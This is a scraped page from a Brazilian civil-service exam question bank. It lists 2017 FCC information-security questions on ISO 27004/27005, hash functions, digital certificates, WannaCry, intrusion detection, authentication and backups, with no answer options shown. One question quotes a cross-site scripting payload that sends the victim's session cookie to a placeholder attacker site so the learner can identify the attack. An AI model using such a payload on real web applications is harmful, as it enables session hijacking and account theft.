Magna Concursos

Foram encontradas 16.796 questões.

415425 Ano: 2017
Disciplina: TI - Segurança da Informação
Banca: FCC
Orgão: TRT-24
Provas:
A norma ABNT NBR ISO/IEC 27004:2010 recomenda que se estabeleça e gerencie um Programa de Medição de Segurança da Informação − PMSI a fim de alcançar os objetivos de medição estabelecidos e adotar o modelo PDCA nas atividades de medição globais da organização. A Norma recomenda que o PMSI inclua os processos de
 

Provas

Questão presente nas seguintes provas
415424 Ano: 2017
Disciplina: TI - Segurança da Informação
Banca: FCC
Orgão: TRT-24
Provas:

Considere os processos abaixo.

Processos do SGSI

− Planejar.

− Executar.

− Verificar.

− Agir.

Processos de GRSI

− Definição do contexto.

− Avaliação de riscos.

− Definição do plano de tratamento do risco.

− Aceitação do risco.

− Implementação do plano de tratamento do risco.

− Monitoramento contínuo e análise crítica de riscos.

− Manter e melhorar o processo de GRSI.

A norma ABNT NBR ISO/IEC 27005:2011 apresenta o alinhamento do processo do Sistema de Gestão da Segurança da Informação – SGSI e do processo de Gestão de Riscos de Segurança da Informação – GRSI. Segundo a Norma, o processo de GRSI denominado

 

Provas

Questão presente nas seguintes provas
415423 Ano: 2017
Disciplina: TI - Segurança da Informação
Banca: FCC
Orgão: TRT-24
Provas:

Considere um cenário em que uma aplicação utiliza dados não confiáveis na construção do seguinte fragmento HTML sem validação ou filtro:

(String) page += "<input name='num_cartao_credito' type='TEXT' value='" +

request.getParameter("credit_card") + " '>";

Considere, ainda, que um atacante modifica o parâmetro 'credit_card' em seu navegador para:

'><script>document.location= 'http://www.atacante.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>'

Isso causa o envio do ID de sessão da vítima para o site do atacante, permitindo que sequestre a sessão atual do usuário.

Este é um cenário de ataque do tipo

 

Provas

Questão presente nas seguintes provas
415422 Ano: 2017
Disciplina: TI - Segurança da Informação
Banca: FCC
Orgão: TRT-24
Provas:
Para verificar a integridade de uma informação pode-se utilizar o resumo que foi gerado a partir dela por meio de algoritmos (ou funções) de hash como o MD5, SHA-1, SHA-256, SHA-512 etc. O SHA-256 e o SHA-512 são funções de hash computadas com palavras, respectivamente, de
 

Provas

Questão presente nas seguintes provas
415421 Ano: 2017
Disciplina: TI - Segurança da Informação
Banca: FCC
Orgão: TRT-24
Provas:
Um Analista precisa escolher um Certificado de Assinatura Digital para ser utilizado na rede virtual privada da organização onde trabalha e na assinatura de documentos com verificação da integridade das informações. Optou corretamente por um certificado do tipo A2, cuja
 

Provas

Questão presente nas seguintes provas
413849 Ano: 2017
Disciplina: TI - Segurança da Informação
Banca: FCC
Orgão: TRE-PR

O ransomware WannaCry recebido e analisado pelo US-CERT é um carregador que contém uma DLL criptografada pelo algoritmo ..I.. . Durante o tempo de execução, o carregador grava um arquivo no disco chamado ‘t.wry’. O malware, em seguida, usa uma chave incorporada de ..II.... bits para descriptografar esse arquivo. Esta DLL, que é então carregada no processo pai, é o real WannaCry Ransomware responsável por criptografar os arquivos do usuário. Usando este método de carregamento criptográfico, o WannaCry DLL nunca é diretamente exposto no disco e portanto não fica vulnerável a varreduras de software antivírus. A DLL recém-carregada imediatamente começa a criptografar arquivos no sistema da vítima usando o mesmo algoritmo e o mesmo tamanho de chave. Uma chave aleatória é gerada para a criptografia de cada arquivo e esta mesma chave deve ser usada para descriptografar o arquivo, mas o hacker cobra um resgate em bitcoins da vítima para fornecer as chaves.”

(Adaptado de: https://www.multirede.com.br/2017/05/15/ataque-cibernetico-proteja-seus-dados-wannacry-ransomware/. Acessado em: 01/07/2017)

As lacunas I e II e a técnica de criptografia são, correta e respectivamente,

 

Provas

Questão presente nas seguintes provas
413848 Ano: 2017
Disciplina: TI - Segurança da Informação
Banca: FCC
Orgão: TRE-PR

Considere que um Sistema de Detecção de Intrusão (Intrusion Detection System − IDS) de um Tribunal foi configurado para realizar certo tipo de detecção. Um usuário, que sempre realiza o acesso à Internet no horário comercial, está sendo monitorado pelo IDS. Este IDS passou uma semana criando o perfil deste usuário e, a partir do último dia daquela semana, começou a empregar em seu perfil o horário comercial como o permitido para a utilização da Internet. Certo dia, após a detecção estar ativa, o usuário quis acessar a Internet durante a madrugada para entregar um relatório importante. Como este comportamento não estava de acordo com o perfil criado, a resposta a esta detecção realizada pelo IDS foi o bloqueio do acesso à Internet para aquele usuário. Neste caso, o IDS detectou um falso positivo. Embora isso possa ocorrer, pois o comportamento de usuários e sistemas pode variar amplamente, este tipo de detecção pode identificar novas formas de ataques.

O tipo relatado é denominado Detecção

 

Provas

Questão presente nas seguintes provas
413846 Ano: 2017
Disciplina: TI - Segurança da Informação
Banca: FCC
Orgão: TRE-PR

Consider the statements below.

I. It is defined as a procedure requiring the combination of several factors, including at least two of the following: Knowledge-something the user knows, e.g., a password, a personal identification number (PIN); Ownership-something the user has, e.g., token, smart card, mobile phone/SIM; Inherence − something the user is, e.g., fingerprint. It is worth highlighting that the aforementioned requirement of having mutually independent factors could be difficult to match. In fact, in the context of access to Internet services, when using ownership and inherence factors as well as when inputting a PIN or password, the user transmits digital data to the verifying counterpart, so that regardless of the generating factor, susceptibility to interception is a common vulnerability.

II. Security administration can be costly and prone to error because administrators usually specify access control lists for each user on the system individually. With this kind of control, security is managed at a level that corresponds closely to the organization's structure. Each user is assigned one or more roles, and each role is assigned one or more privileges that are permitted to users in that role. Security administration with it consists of determining the operations that must be executed by persons in particular jobs, and assigning employees to the proper roles. Complexities introduced by mutually exclusive roles or role hierarchies are handled by its software, making security administration easier.

The statements I and II refers respectively to

 

Provas

Questão presente nas seguintes provas
413845 Ano: 2017
Disciplina: TI - Segurança da Informação
Banca: FCC
Orgão: TRE-PR
Provas:
Um Técnico é responsável pela realização de cópias de segurança de um Tribunal. Este profissional deve tomar diversas precauções, dentre as quais se encontra:
 

Provas

Questão presente nas seguintes provas
413844 Ano: 2017
Disciplina: TI - Segurança da Informação
Banca: FCC
Orgão: TRE-PR
Provas:

The purpose of most backup policies is to create a copy of data so that a particular file or application may be restored after data is lost, corrupted, deleted or a disaster strikes. Thus, backup is not the goal, but rather it is one means to accomplish the goal of protecting data. Testing backups is just as important as backing up and restoring data. Backup applications have long offered several types of backup operations. Two of the most common backup types are described below.

I. This operation will result in copying only the data that has changed since the last backup operation of any type. The modified time stamp on files is typically used and compared to the time stamp of the last backup. Backup applications track and record the date and time that backup operations occur in order to track files modified since these operations. Because this backup will only copy data since the last backup of any type, it may be run as often as desired, with only the most recent changes stored.

II. This type of backup makes a copy of all data to another set of media, which can be tape, disk or a DVD or CD. The primary advantage to performing this backup during every operation is that a complete copy of all data is available with a single set of media. This results in a minimal time to restore data, a metric known as a Recovery Time Objective (RTO).

The backup types I and II are, respectivelly,

 

Provas

Questão presente nas seguintes provas